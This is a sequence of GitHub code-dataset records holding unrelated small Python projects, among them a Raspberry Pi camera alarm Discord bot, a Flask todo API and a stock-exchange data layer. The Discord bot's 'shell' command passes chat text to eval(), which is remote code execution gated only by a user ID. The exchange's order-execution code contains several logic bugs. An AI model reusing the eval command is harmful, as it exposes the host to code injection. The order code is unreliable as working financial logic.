UNetNested()\n param = count_param(model)\n # print(model)\n print('UNetNested total parameters: %.2fM (%d)' % (param /1e6, param))","repo_name":"junwenxiong/HuaweiCloudCup","sub_path":"unet/unetNested.py","file_name":"unetNested.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36750547295","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom dynamic_reconfigure.client import Client\n\ndef callback(config):\n rospy.loginfo(\"Config set to {footprint}\".format(**config))\n\nif __name__ == \"__main__\":\n rospy.init_node(\"dynamic_client\")\n\n client = Client(\"/move_base_node/global_costmap\", timeout=5, config_callback=callback)\n print(client.get_parameter_descriptions())\n r = rospy.Rate(0.1)\n while not rospy.is_shutdown():\n client.update_configuration({\"footprint\":[[0.6,-0.3],[0.5,0.3],[-0.3,0.3],[-0.4,-0.2]]})\n r.sleep()","repo_name":"AmmarAlbakri/ammar_src","sub_path":"amr_services/scripts/dynamic_reconfigure_client.py","file_name":"dynamic_reconfigure_client.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9111502134","text":"#Jerry To\n#Capture the Honey Game\n#Written using Python 3.3.3 and Pygame \n#All art assets are free clip art from www.clker.com\n#Sound is from www.soundbible.com \n\nimport pygame, os, sys\nfrom pygame.locals import *\n#Class for each menu choice \nclass MenuItem():\n def __init__(self,text, font, x, y):\n self.text = text\n self.font = font\n self.textColor = (218, 165, 32)\n self.menuItem = self.font.render(self.text, 1, self.textColor)\n self.itemWidth = self.menuItem.get_rect().width\n self.itemHeight = self.menuItem.get_rect().height + 20\n self.x = x\n self.y = y\n self.pos = self.x, self.y\n \n #Sets position in menu for each option \n def setPos(self, x, y):\n self.x = x\n self.y = y\n self.pos = (x, y)\n #Set color of text \n def setColor(self, color):\n self.textColor = color\n self.menuItem = self.font.render(self.text, 1, self.textColor)\n #Checks if mouse hovers over \n def mouseSelected(self, mouse):\n if (mouse[0] >= self.x and mouse[0] <= (self.x + self.itemWidth)) and \\\n (mouse[1] >= self.y and mouse[1] <= (self.y + self.itemHeight)):\n return True\n \n return False\n #Checks if mouse clicked option \n def mouseClicked(self, mouse):\n if mouse.get_pressed()[0]:\n return True\n\n return False \n \n \n \n \n\n \n \n \n","repo_name":"jerryto48/CaptureTheHoney","sub_path":"MenuItem.py","file_name":"MenuItem.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16510798995","text":"from picamera import PiCamera\nfrom discord.ext import commands\nfrom discord.ext import tasks\nimport gpiozero\nimport shutil\nimport os\n\n# from picamera import PiCamera\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport discord, json, random, time, sys, threading, asyncio\n\nwith open(\"setting/setting.json\") as file:\n setting = json.load(file)\n\nwith open(\"locales/{}.json\".format(setting[\"global\"][\"language\"])) as file:\n text = json.load(file)\n\ntry:\n os.mkdir(\"capture\")\n sys.stdout.write(text[\"debug\"][\"makeCapture\"])\nexcept:\n pass\n\nbot = commands.Bot(\n description=setting[\"global\"][\"description\"],\n command_prefix=setting[\"global\"][\"prefix\"],\n)\n\ncamera = PiCamera()\nfirstConnection = True\nlocked = False\n\n\n@bot.command()\nasync def lock(ctx, *arg):\n global locked\n locked = True\n await ctx.send(embed=makeEmbed(text[\"embed\"][\"lock\"]))\n\n\n@bot.command()\nasync def unlock(ctx, *arg):\n global locked\n locked = False\n await ctx.send(embed=makeEmbed(text[\"embed\"][\"unlock\"]))\n\n\ndef makeEmbed(file):\n embed = discord.Embed(\n title=file[\"title\"],\n description=file[\"description\"],\n color=discord.Color.from_rgb(\n file[\"color\"][0],\n file[\"color\"][1],\n file[\"color\"][2],\n ),\n )\n for field in file[\"fields\"]:\n embed.add_field(\n name=field[\"name\"], value=field[\"value\"], inline=field[\"inline\"]\n )\n return embed\n\n\n# make a capture with picamera\ndef take_picture():\n name = time.strftime(\"capture/img %Hh %Mmin %Ssec.jpg\")\n camera.capture(name)\n sys.stdout.write(text[\"debug\"][\"saveImg\"].format(name))\n return name\n\n\ndef take_video(recordTime):\n \"\"\"record a video (only in h264 format because encoding are very slow on rasberry)\"\"\"\n name = time.strftime(\"capture/vid %Hh %Mmin %Ssec.h264\")\n camera.start_recording(name)\n camera.wait_recording(recordTime)\n camera.stop_recording()\n sys.stdout.write(text[\"debug\"][\"saveVid\"].format(name))\n return name\n\n\n@bot.event\nasync def on_ready():\n global firstConnection, channel\n if firstConnection:\n sys.stdout.write(\"ok \\n\")\n channel = bot.get_channel(setting[\"global\"][\"channel\"])\n\n sys.stdout.write(\n \"logged in as {} \\nat {}\\n\".format(\n bot.user, time.strftime(\"%Hh %Mmin %Ssec\")\n )\n )\n gpioInit()\n firstConnection = False\n await channel.send(embed=makeEmbed(text[\"embed\"][\"start\"]))\n await dailyCheck()\n sys.stdout.write(\" - - - event - - - \\n\")\n\n else:\n sys.stdout.write(\n \"> reconnected at {}\\n\".format(time.strftime(\"%Hh %Mmin %Ssec\"))\n )\n await channel.send(embed=makeEmbed(text[\"embed\"][\"reconnect\"]))\n\n\nasync def alert_pic(name):\n \"\"\"take a picture\"\"\"\n global channel\n sys.stdout.write(text[\"debug\"][\"sensorActivated\"].format(name))\n await channel.send(\n content=text[\"text\"][\"sensorActivated\"].format(\n name, time.strftime(\"%Hh %Mmin %Ssec\")\n ),\n file=discord.File(take_picture()),\n )\n\n\n@bot.command()\nasync def pic(ctx, *arg):\n \"\"\"manually take a picture\"\"\"\n await ctx.send(\n content=text[\"text\"][\"imgTaken\"].format(time.strftime(\"%Hh %Mmin %Ssec\")),\n file=discord.File(take_picture()),\n )\n\n\n@bot.command()\nasync def vid(ctx, *arg):\n \"\"\"manually take a video (only in h264 because encoding on rasberry are slow) argument: time in second\"\"\"\n message = await ctx.send(content=text[\"text\"][\"record\"])\n try:\n await ctx.send(file=discord.File(take_video(int(arg[0]))))\n await message.edit(\n content=text[\"text\"][\"vidTaken\"].format(time.strftime(\"%Hh %Mmin %Ssec\")),\n )\n except:\n await message.edit(content=\"\", embed=makeEmbed(text[\"embed\"][\"videoError\"]))\n\n\n@bot.command()\nasync def shell(ctx, *arg):\n \"\"\"shell comand for debug\"\"\"\n embed = discord.Embed(\n title=\"Shell command\",\n color=discord.Color.red(),\n description=\" \".join(arg),\n )\n\n embed.set_author(name=ctx.author.display_name, icon_url=ctx.author.avatar_url)\n if ctx.author.id == shellAccess:\n try:\n embed.add_field(name=\"Result :\", value=str(eval(\" \".join(arg))))\n embed.color = discord.Color.blue()\n except:\n embed.add_field(name=\"Error :\", value=str(sys.exc_info()))\n sys.stdout.write(\n '> executed \" {} \" command in {}'.format(\" \".join(arg), ctx.channel)\n )\n else:\n embed.add_field(name=\"denied access\", value=\"you can't use this command\")\n await ctx.send(embed=embed)\n\n\n@bot.command()\nasync def state(ctx, *arg):\n \"\"\"show state of all sensors\"\"\"\n embed = makeEmbed(text[\"embed\"][\"state\"])\n states = \"\"\n for elem in ils:\n states += \"{} | {} {} \\n\".format(\n elem[2],\n \"🟩\" if elem[0].is_pressed == elem[1] else \"🟥\",\n text[\"text\"][\"close\"] if elem[0].is_pressed else text[\"text\"][\"open\"],\n )\n embed.description = f\"```{states}```\"\n await ctx.send(embed=embed)\n\n\n@bot.command()\nasync def disk(ctx, *arg):\n await checkDisk(ctx.channel)\n\n\nasync def checkDisk(channel, onlyIfLow=False):\n \"\"\"check disk space\"\"\"\n disk = shutil.disk_usage(\"/\")\n if onlyIfLow:\n if disk.free / disk.total > 0.1:\n return\n else:\n sys.stdout.write(\"> disk space is low\\n\")\n embed = makeEmbed(text[\"embed\"][\"diskLow\"])\n else:\n embed = makeEmbed(text[\"embed\"][\"disk\"])\n\n embed.description = text[\"text\"][\"disk\"].format(\n disk.total / (1024 * 1024 * 1024),\n disk.used / (1024 * 1024 * 1024),\n disk.free / (1024 * 1024 * 1024),\n disk.free / disk.total * 100,\n )\n await channel.send(embed=embed)\n\n\n@bot.command()\n@commands.has_permissions(administrator=True)\nasync def delete(ctx, day=999999999, *arg):\n \"\"\"delete all capture older than day argument: day in number\"\"\"\n await deleteOldCapture(ctx.channel, float(day))\n\n\nasync def deleteOldCapture(channel, day, automatic=False):\n \"\"\"delete old image\"\"\"\n deletes = []\n for file in os.listdir(\"capture\"):\n if file.endswith(\".jpg\") or file.endswith(\".h264\"):\n file_path = os.path.join(\"capture/\", file)\n if os.path.isfile(file_path):\n if time.time() - os.path.getmtime(file_path) > day * 24 * 60 * 60:\n os.remove(file_path)\n sys.stdout.write(f\"> {file_path} deleted\\n\")\n deletes.append(file)\n\n if len(deletes) == 0:\n if automatic:\n return\n else:\n await channel.send(embed=makeEmbed(text[\"embed\"][\"deleteEmpty\"]))\n else:\n embed = makeEmbed(text[\"embed\"][\"delete\"])\n embed.description = text[\"text\"][\"delete\"].format(\"\\n\".join(deletes))\n await channel.send(embed=embed)\n\n\n# gpio setup\n@tasks.loop(seconds=0.5)\nasync def eventLoop():\n if locked:\n for elem in ils:\n if elem[0].is_pressed != elem[1]:\n await alert_pic(elem[2])\n\n\ndef gpioInit():\n global ils\n ils = []\n for elem in setting[\"alarm\"][\"ils\"]:\n ils.append([gpiozero.Button(elem[\"port\"]), elem[\"close\"], elem[\"name\"]])\n\n eventLoop.start()\n\n\nwith open(\"setting/token.json\") as file:\n tokenFile = json.load(file)\n\n# daily check\n@tasks.loop(hours=24)\nasync def dailyCheck():\n await checkDisk(channel, True)\n if setting[\"global\"][\"captureTimeout\"] != -1:\n await deleteOldCapture(channel, setting[\"global\"][\"captureTimeout\"], True)\n\n\nsys.stdout.write(\"loggin to discord...\")\nshellAccess = tokenFile[\"shellAccess\"]\nbot.run(tokenFile[\"botToken\"])\n","repo_name":"orkeilius/alarm_discord_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37090972172","text":"import turtle\n\n\ntrtle = turtle.Turtle()\n\ncolor = input(\"Give me any color: \")\nprint(color)\nnumber = int(input(\"Give me the length: \"))\nprint(number)\n\ntrtle.color(color)\ntrtle.right(90)\ntrtle.forward(number)\n\n\nscreen = turtle.Screen()\nscreen.mainloop()","repo_name":"CowSai4/Python_CSP_Files","sub_path":"turtle/1.1/input_testing.py","file_name":"input_testing.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21301753509","text":"from flask import Flask, request, jsonify, g\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport os\n\n# Initialize the Flask application\napp = Flask(__name__)\n\n# Set up the SQLite database\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'db.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# Initialize the database and marshmallow\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\n# Define the Task class\nclass Task(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(80), nullable=False)\n completed = db.Column(db.Boolean, default=False, nullable=False)\n\n def __init__(self, title, completed=False):\n self.title = title\n self.completed = completed\n\n# Define the Task schema\nclass TaskSchema(ma.Schema):\n class Meta:\n fields = ('id', 'title', 'completed')\n\n# Initialize the schema\ntask_schema = TaskSchema()\ntasks_schema = TaskSchema(many=True)\n\n# Create a new task\n@app.route('/task', methods=['POST'])\ndef add_task():\n if not request.json or 'title' not in request.json:\n return jsonify({'error': 'The title field is required.'}), 400\n title = request.json['title']\n completed = request.json.get('completed', False)\n new_task = Task(title, completed)\n db.session.add(new_task)\n db.session.commit()\n return task_schema.jsonify(new_task)\n\n# Get all tasks\n@app.route('/tasks', methods=['GET'])\ndef get_tasks():\n all_tasks = Task.query.all()\n result = tasks_schema.dump(all_tasks)\n return jsonify(result)\n\n# Get a single task\n@app.route('/task/', methods=['GET'])\ndef get_task(id):\n task = Task.query.get(id)\n if not task:\n return jsonify({'error': 'Task not found.'}), 404\n return task_schema.jsonify(task)\n\n# Update a task\n@app.route('/task/', methods=['PUT'])\ndef update_task(id):\n task = Task.query.get(id)\n if not task:\n return jsonify({'error': 'Task not found.'}), 404\n title = request.json.get('title', task.title)\n completed = request.json.get('completed', task.completed)\n task.title = title\n task.completed = completed\n db.session.commit()\n return task_schema.jsonify(task)\n\n# Delete a task\n@app.route('/task/', methods=['DELETE'])\ndef delete_task(id):\n task = Task.query.get(id)\n if not task:\n return jsonify({'error': 'Task not found.'}), 404\n db.session.delete(task)\n db.session.commit()\n return task_schema.jsonify(task)\n\n# Mark a task as completed\n@app.route('/task/complete/', methods=['PUT'])\ndef complete_task(id):\n task = Task.query.get(id)\n if not task:\n return jsonify({'error': 'Task not found.'}), 404\n task.completed = True\n db.session.commit()\n return task_schema.jsonify(task)\n\n# Mark a task as incomplete\n@app.route('/task/incomplete/', methods=['PUT'])\ndef incomplete_task(id):\n task = Task.query.get(id)\n if not task:\n return jsonify({'error': 'Task not found.'}), 404\n task.completed = False\n db.session.commit()\n return task_schema.jsonify(task)\n\n@app.before_request\ndef before_request():\n g.db = db\n# Run the application\nif __name__ == '__main__':\n with app.app_context():\n db.create_all()\n app.run(debug=True)\n\n \n","repo_name":"mayank-root/TODO-LIST","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19765247133","text":"#ETGG 1801\r\n#Eli Vaudrin\r\n#Lab05-Game Loops\r\n#Date:10/3/20\r\n\r\nimport pygame as pyg\r\nimport pygame.gfxdraw\r\nimport sys, math\r\n\r\npyg.init()\r\npyg.event.set_allowed([pyg.QUIT, pyg.MOUSEMOTION, pyg.MOUSEBUTTONDOWN, pyg.KEYDOWN])\r\n\r\n\r\nwindowClock = pygame.time.Clock()\r\nfps = 120\r\n\r\nres = (500, 500)\r\nrealres = (res[0]*1.2, res[1]*1.2)\r\n\r\nupdated = False\r\ndrects = []\r\n\r\n\r\nclear = (0, 0, 0, 0)\r\nw = (255, 255, 255)\r\ngray = (220, 220, 220)\r\nblck = (0, 0, 0)\r\nrd = (255, 0, 0)\r\ng = (0, 232, 0)\r\nb = (0, 45, 242)\r\ny = (252, 243, 5)\r\np = (132, 0, 165)\r\no = (249, 137, 11)\r\n\r\n\r\nmyColors = [w, blck, rd, g, b, y, p, o]\r\n\r\nmyWindow = pyg.display.set_mode(res, pyg.DOUBLEBUF)\r\nmyWindow.fill(w)\r\nmyCanvas = pyg.Surface((realres[0], realres[1]*0.84)).convert_alpha()\r\nmyCanvas.fill(w)\r\nL1 = myCanvas.copy()\r\nL2 = myCanvas.copy()\r\nL3 = myCanvas.copy()\r\nL4 = myCanvas.copy()\r\nL5 = myCanvas.copy()\r\nlayers = [L1, L2, L3, L4, L5]\r\nfor layer in layers:\r\n layer.fill(clear)\r\noverlay = pyg.Surface(res).convert_alpha()\r\n\r\nrealrect = pyg.Rect(0, 0, realres[0], int(realres[1]*0.84))\r\nscreenrect = pyg.Rect(0, 0, res[0], int(res[1]*0.84))\r\ncolorBar = pyg.Rect(0, 420, 500, 80)\r\n\r\nr = 25\r\nclr = blck\r\nstartpoint = None\r\nendpoint = None\r\nongoing = False\r\nundone = 0\r\nmaxundone = 0\r\nholdClick = False\r\n\r\ndef button(color, rect):\r\n global clr,holdClick\r\n if 0 <= rect <= 9:\r\n rect = pyg.Rect(48*rect+12, 446, 44, 44)\r\n if pyg.mouse.get_pressed()[0] and rect.collidepoint(mosPos) and not holdClick:\r\n clr = color\r\n drects.append(colorBar)\r\n if clr == color:\r\n pyg.draw.rect(overlay, color, rect)\r\n pyg.draw.rect(overlay, blck, rect, 3)\r\n else:\r\n pyg.draw.rect(overlay, color, (rect[0]+4, rect[1]+4, rect[2]-8, rect[3]-8))\r\n pyg.draw.rect(overlay, blck, (rect[0]+4, rect[1]+4, rect[2]-8, rect[3]-8), 3)\r\n\r\ndef drawline():\r\n global startpoint, endpoint, start\r\n if startpoint == None:\r\n startpoint = x, y\r\n endpoint = x, y\r\n if r > 1:\r\n if startpoint != endpoint:\r\n dx, dy = endpoint[0]-startpoint[0], endpoint[1]-startpoint[1]\r\n angle = math.atan2(-dy, dx)%(2*math.pi)\r\n dx, dy = math.sin(angle)*(r*0.999), math.cos(angle)*(r*0.999)\r\n a = startpoint[0]+dx, startpoint[1]+dy\r\n b = startpoint[0]-dx, startpoint[1]-dy\r\n c = endpoint[0]-dx, endpoint[1]-dy\r\n d = endpoint[0]+dx, endpoint[1]+dy\r\n pointlist = [a, b, c, d]\r\n pyg.draw.polygon(L1, clr, pointlist)\r\n pyg.draw.circle(L1, clr, (x, y), r)\r\n else:\r\n pyg.draw.line(L1, clr, startpoint, endpoint, r)\r\n startpoint = x, y\r\n\r\ndef shiftdown():\r\n for layer in reversed(layers):\r\n if layer == L5:\r\n myCanvas.blit(L5, (0, 0))\r\n else:\r\n layers[layers.index(layer)+1].blit(layer, (0, 0))\r\n\r\ndef shiftup():\r\n for layer in layers:\r\n if layer == L5:\r\n layer.fill(clear)\r\n else:\r\n layer.fill(clear)\r\n layer.blit(layers[layers.index(layer)+1], (0, 0))\r\n\r\noverlay.fill(clear)\r\npyg.draw.rect(overlay, gray, colorBar)\r\npyg.draw.rect(overlay, blck, colorBar, 3)\r\n\r\noverlaybg = overlay.copy()\r\n\r\nwhile True:\r\n for event in pyg.event.get():\r\n if event.type == pyg.QUIT or pyg.key.get_pressed()[pyg.K_ESCAPE]:\r\n pyg.quit()\r\n sys.exit()\r\n\r\n if event.type == pyg.MOUSEMOTION:\r\n mosPos = pyg.mouse.get_pos()\r\n x = int(mosPos[0]*(realres[0]/res[0]))\r\n y = int(mosPos[1]*(realres[1]/res[1]))\r\n holdingclick = True\r\n if screenrect.collidepoint(mosPos):\r\n drects.append(screenrect)\r\n\r\n if event.type == pyg.MOUSEBUTTONDOWN:\r\n holdingclick = False\r\n if screenrect.collidepoint(mosPos):\r\n drects.append(screenrect)\r\n\r\n if event.button == 4 and r < 100:\r\n r += 1\r\n drects.append(screenrect)\r\n elif event.button == 5 and r > 2:\r\n r -= 1\r\n drects.append(screenrect)\r\n\r\n if event.type == pyg.KEYDOWN:\r\n\r\n if event.key == pyg.K_DELETE or pyg.K_BACKSPACE:\r\n myCanvas.fill(w)\r\n L1.fill(clear)\r\n L2.fill(clear)\r\n L3.fill(clear)\r\n L4.fill(clear)\r\n L5.fill(clear)\r\n undone = 0\r\n maxundone = 0\r\n drects.append(screenrect)\r\n\r\n\r\n if pyg.mouse.get_pressed()[0] and screenrect.collidepoint(mosPos):\r\n if not ongoing:\r\n while undone > 0:\r\n shiftup()\r\n undone -= 1\r\n maxundone -= 1\r\n shiftdown()\r\n drawline()\r\n ongoing = True\r\n else:\r\n startpoint = None\r\n if ongoing:\r\n if maxundone < 5:\r\n maxundone += 1\r\n ongoing = False\r\n\r\n if screenrect in drects:\r\n\r\n myWindow.fill(w)\r\n for layer in layers:\r\n if layers.index(layer) == undone:\r\n myWindow.blit(pyg.transform.smoothscale(layer, (screenrect[2], screenrect[3])), screenrect)\r\n\r\n overlay.fill(clear)\r\n if r > 1:\r\n pyg.gfxdraw.aacircle(overlay, mosPos[0], mosPos[1], int(r*res[0]/realres[0]), gray)\r\n overlay.blit(overlaybg, screenrect)\r\n for color in myColors:\r\n button(color, myColors.index(color))\r\n myWindow.blit(overlay, screenrect)\r\n\r\n pyg.display.set_caption('Draw | FPS: ' + str(int(windowClock.get_fps())))\r\n windowClock.tick(fps)\r\n\r\n if not updated:\r\n pyg.display.update()\r\n updated = True\r\n pyg.display.update(drects)\r\n drects.clear()","repo_name":"EliVaudrin/etgg1801-lab05-eli_vaudrin","sub_path":"Drawing_Lab05_Eli_Vaudrin.py","file_name":"Drawing_Lab05_Eli_Vaudrin.py","file_ext":"py","file_size_in_byte":5754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7858610361","text":"from qgis.core import *\nfrom qgis.gui import *\nfrom PyQt4.QtGui import *\n\n\ndef get_overlay(overlay_name, uri, style_func):\n registry = QgsMapLayerRegistry.instance()\n layer = None\n for layer_name in registry.mapLayers():\n current_layer = registry.mapLayer(layer_name)\n if current_layer.originalName() == overlay_name:\n layer = current_layer\n break\n if layer is None:\n layer = QgsVectorLayer(uri, overlay_name, 'memory')\n if not layer.isValid():\n raise Exception('Overlay layer is not valid')\n style_func(layer)\n registry.addMapLayer(layer)\n return layer\n\n\ndef remove_all(layer):\n fids = []\n feat = QgsFeature()\n features = layer.getFeatures()\n while features.nextFeature(feat):\n fids.append(feat.id())\n features.close()\n layer.startEditing()\n if not layer.deleteFeatures(fids):\n raise Exception(\"Could not delete features\")\n layer.commitChanges()\n","repo_name":"msieger/swm_nis_topology","sub_path":"topology_plugin/ui/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8913996845","text":"a = [int(input()) for _ in range(9)]\r\n\r\nfind = i =0\r\nwhile not find:\r\n for j in range(i+1, 9):\r\n if sum(a)-a[i]-a[j] == 100:\r\n a.pop(j)\r\n a.pop(i)\r\n a.sort()\r\n find = 1\r\n for elem in a:\r\n print(elem)\r\n break\r\n i += 1","repo_name":"qorjiwon/Algorithm","sub_path":"백준/Bronze/2309. 일곱 난쟁이/일곱 난쟁이.py","file_name":"일곱 난쟁이.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14011049203","text":"# data.py\nfrom sqlalchemy import create_engine, Column, Integer, String, Float, ForeignKey\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom consts import ordertypes, orderstatuses\n\n# Create a SQLAlchemy database engine\nDATABASE_URL = \"sqlite:///exchange.db\"\nengine = create_engine(DATABASE_URL)\n\n# Create a Session class to interact with the database\nSession = sessionmaker(bind=engine)\n\n# Define the SQLAlchemy model for customer data\nBase = declarative_base()\nclass Customer(Base):\n __tablename__ = 'customers'\n\n id = Column(Integer, primary_key=True, index=True)\n name = Column(String, index=True)\n account_balance = Column(Float)\n\n# Define the SQLAlchemy model for positions\nclass Position(Base):\n __tablename__ = 'positions'\n\n id = Column(Integer, primary_key=True, index=True)\n customer_id = Column(Integer, ForeignKey('customers.id'), index=True)\n stock_symbol = Column(String, ForeignKey('stocks.symbol'), index=True)\n number_of_shares = Column(Integer)\n bought_at_price = Column(Float)\n bought_at_date = Column(String)\n\nclass Stock(Base):\n __tablename__ = 'stocks'\n \n id = Column(Integer, primary_key=True, index=True)\n stock_symbol = Column(String, index=True)\n company = Column(String, index=True)\n company_description = Column(String)\n price = Column(Float, index=True)\n\n\n# Define the SQLAlchemy model for buy and sell orders\nclass Order(Base):\n __tablename__ = 'orders'\n\n id = Column(Integer, primary_key=True, index=True)\n customer_id = Column(Integer, ForeignKey('customers.id'), index=True)\n order_type = Column(String) # 'buy' or 'sell'\n stock_symbol = Column(String, ForeignKey('stocks.symbol'), index=True)\n quantity = Column(Integer)\n price = Column(Float)\n status = Column(String)\n\nBase.metadata.create_all(bind=engine)\n\n\ndef get_all_customers()-> list[Customer]:\n session = Session()\n try:\n customers = session.query(Customer).all()\n return customers\n finally:\n session.close()\n\n\ndef create_new_order(customer_id: int, order_type: String, stock_symbol: String, quantity: int, price: float)-> Order|None:\n '''\n Create a new order in the market\n '''\n session = Session()\n new_order = Order(\n customer=customer_id, \n order_type=order_type, \n stock_symbol=stock_symbol, \n quantity=quantity, price=price, \n status=orderstatuses.ACTIVE\n )\n try:\n session.add(new_order)\n session.commit()\n session.refresh(new_order) # get order ID\n return new_order\n except:\n new_order = None\n finally:\n session.close()\n return new_order\n\ndef get_orders(stock_symbol)-> list[Order]:\n session = Session()\n try:\n return session.query(Order).filter(Order.stock_symbol == stock_symbol).all()\n finally:\n session.close()\n return None\n\ndef execute_order(order: int, counterparty: int)-> Order|None:\n '''\n Execute the provided order with the customer id provided as counterparty.\n This will only execute ACTIVE orders, and returns the order if successful, otherwise None.\n TODO: implement something to indicate why stuff failed\n '''\n session = Session()\n try:\n # is the order in the correct state?\n order = session.query(Order).filter(Order.id).first()\n if order is None:\n return None\n if order.status != orderstatuses.ACTIVE:\n return None\n \n # does the buyer have the funds?\n buyer_account = session.query(Customer).filter(Customer.id == buyer.id).first()\n seller_account = session.query(Customer).filter(Customer.id == counterparty).first()\n total = order.price * order.quantity\n if buyer_account is None or seller_account is None:\n return None\n if buyer_account.account_balance < total:\n return None\n \n # does the seller hold the position?\n seller = None\n buyer = None\n create_buyer = False\n if order.order_type == ordertypes.BUY:\n seller = session.query(Position).filter(Position.customer_id == counterparty and Position.stock_symbol == order.stock_symbol).first()\n buyer = session.query(Position).filter(Position.customer_id == order.customer_id).first()\n if buyer is None:\n buyer = Position(customer_id=order.customer_id, stock_symbol=order.stock_symbol, quantity=order.quantity, bought_at_price=order.price, bought_at_date='2000-12-31')\n create_buyer = True\n else: # it is a sell order\n buyer = session.query(Position).filter(Position.customer_id == counterparty).first()\n seller = session.query(Position).filter(Position.customer_id == order.customer_id and Position.stock_symbol == order.stock_symbol).first()\n if buyer is None:\n buyer = Position(customer_id=counterparty, stock_symbol=order.stock_symbol, quantity=order.quantity, bought_at_price=order.price, bought_at_date='2000-12-31')\n create_buyer = True\n\n if seller is None:\n return None\n \n # update the positions\n buyer_account.account_balance -= total\n seller_account += total\n\n if create_buyer:\n session.add(buyer)\n else:\n pr_qty = buyer.number_of_shares\n pr_avg = buyer.bought_at_price\n buyer.number_of_shares += order.quantity\n buyer.bought_at_price = (pr_qty * pr_avg + total)/buyer.number_of_shares\n\n seller.number_of_shares -= order.quantity\n\n # update the stock\n stock = session.query(Stock).filter(Stock.stock_symbol == order.stock_symbol).first()\n if stock is not None:\n stock.price = order.price\n\n # update the order and commit\n order.status = orderstatuses.CLOSED\n session.commit()\n session.refresh(buyer)\n return order\n finally:\n session.close()\n return None\n\n\ndef create_new_customer(name: String, account_balance: Float)-> Customer|None:\n '''\n Create a customer with a name that is not currently in use.\n name: name to try and create a user with\n account_balance: initial balance of the account\n '''\n session = Session()\n new_customer = Customer(\n name=name, \n account_balance=account_balance)\n try:\n # Create a new customer based on the provided data\n session.add(new_customer)\n session.commit()\n session.refresh(new_customer) # Refresh the object to get the generated ID\n except:\n new_customer = None\n finally:\n session.close()\n \n return new_customer\n\n\n\ndef change_account_balance(id: int, change: Float)-> bool:\n '''\n Change the balance of the account with the provided id\n id: The id of the user whose account_balance is being changed\n change: Ammount to change account_balance by\n '''\n session = Session()\n try:\n # Check if the customer with the given ID exists\n customer = session.query(Customer).filter(Customer.id == id).first()\n if customer is None:\n return False\n\n # Update the customer's account balance by adding the specified amount\n customer.account_balance += change\n session.commit()\n except:\n return False\n finally:\n session.close()\n\n return True\n\ndef create_stock(id, symbol, company, company_description, price):\n session = Session()\n try:\n new_stock = Stock(id=id, stock_symbol=symbol, company=company, company_description=company_description, price=price)\n session.add(new_stock)\n return new_stock\n finally:\n session.close()\n return None","repo_name":"T33py/MyStockMarket","sub_path":"ExchangeAPI/market_data.py","file_name":"market_data.py","file_ext":"py","file_size_in_byte":7776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22716914133","text":"\"\"\"\n\tSimple Camera (used on Raspberry 3b) Example\n    https://picamera.readthedocs.io/en/release-1.13/recipes1.html\n\"\"\"\nfrom time import sleep\nfrom picamera import PiCamera\n\n\ndef take_picture(name):\n camera = PiCamera()\n\n camera.resolution = (200, 266)\n\n # setting the camera settings\n camera.saturation = 50\n camera.brightness = 55\n camera.contrast = 10\n camera.sharpness = 50\n camera.saturation = 0\n\n camera.start_preview()\n # Camera warm-up time\n sleep(2)\n camera.capture(name)\n camera.stop_preview()\n","repo_name":"Klark007/Selbstfahrendes-Auto-im-Modell","sub_path":"Camera/Pi_Camera.py","file_name":"Pi_Camera.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44687970638","text":"from tkinter import *\r\nfrom tkinter.font import *\r\nfrom numpy import random as rn\r\n\r\ndef nameCallback():\r\n name = e1.get()\r\n l5.config(text=\"Welcoe \"+name)\r\ndef clearEntry():\r\n e1.delete(0,'end')\r\n l5.config(text='')\r\ndef randomColor():\r\n r = rn.randint(0,255)\r\n g = rn.randint(0,255)\r\n b = rn.randint(0,255)\r\n return f'#{r:02x}{g:02x}{b:02x}'\r\n\r\ndef changeColor():\r\n l5.config(bg =randomColor(),fg=randomColor())\r\nroot = Tk()\r\nroot.geometry('520x250')\r\nroot.title(\"Demo Positioning widgets\")\r\nl1 = Label(borderwidth=2,relief='raised',text='raised,PositionL(5,10)')\r\nl2 = Label(borderwidth=2,relief='ridge',text='ridge,PositionL(5,10)')\r\nl3 = Label(borderwidth=2,relief='groove',text='groove,PositionL(5,10)')\r\nl4 = Label(borderwidth=2,relief='solid',text='solid,PositionL(5,10)')\r\nl5 = Label(fg='green',width=20,borderwidth=2,relief='groove',font='none 20')\r\n\r\nb1 = Button(text='Click',width=40,anchor=CENTER,command=nameCallback)\r\nb2 = 